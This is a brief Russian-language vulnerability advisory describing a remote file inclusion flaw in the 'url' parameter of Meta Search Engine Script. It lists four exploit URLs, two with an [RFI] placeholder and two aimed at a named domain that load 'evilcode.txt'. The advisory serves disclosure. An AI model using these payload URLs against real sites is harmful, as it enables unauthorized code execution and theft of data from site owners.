Программа: Meta Search Engine Script

Уязвимость позволяет удаленному злоумышленнику получить несанкционированный
доступ к конфиденциальной информации на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных в параметре «url». Атакующий может
получить несанкционированный доступ к конфиденциальной информации на целевой
системе.

Эксплоит:

http://www.site.com/patch/?url=[RFI]&file=Search
http://www.site.com/patch/index.php?url=[RFI]&file=Search
http://www.mydlstore.net/metasearch/?url=evilcode.txt?&file=Search
http://www.mydlstore.net/metasearch/index.php?url=evilcode.txt?&file=Search

Оставить мнение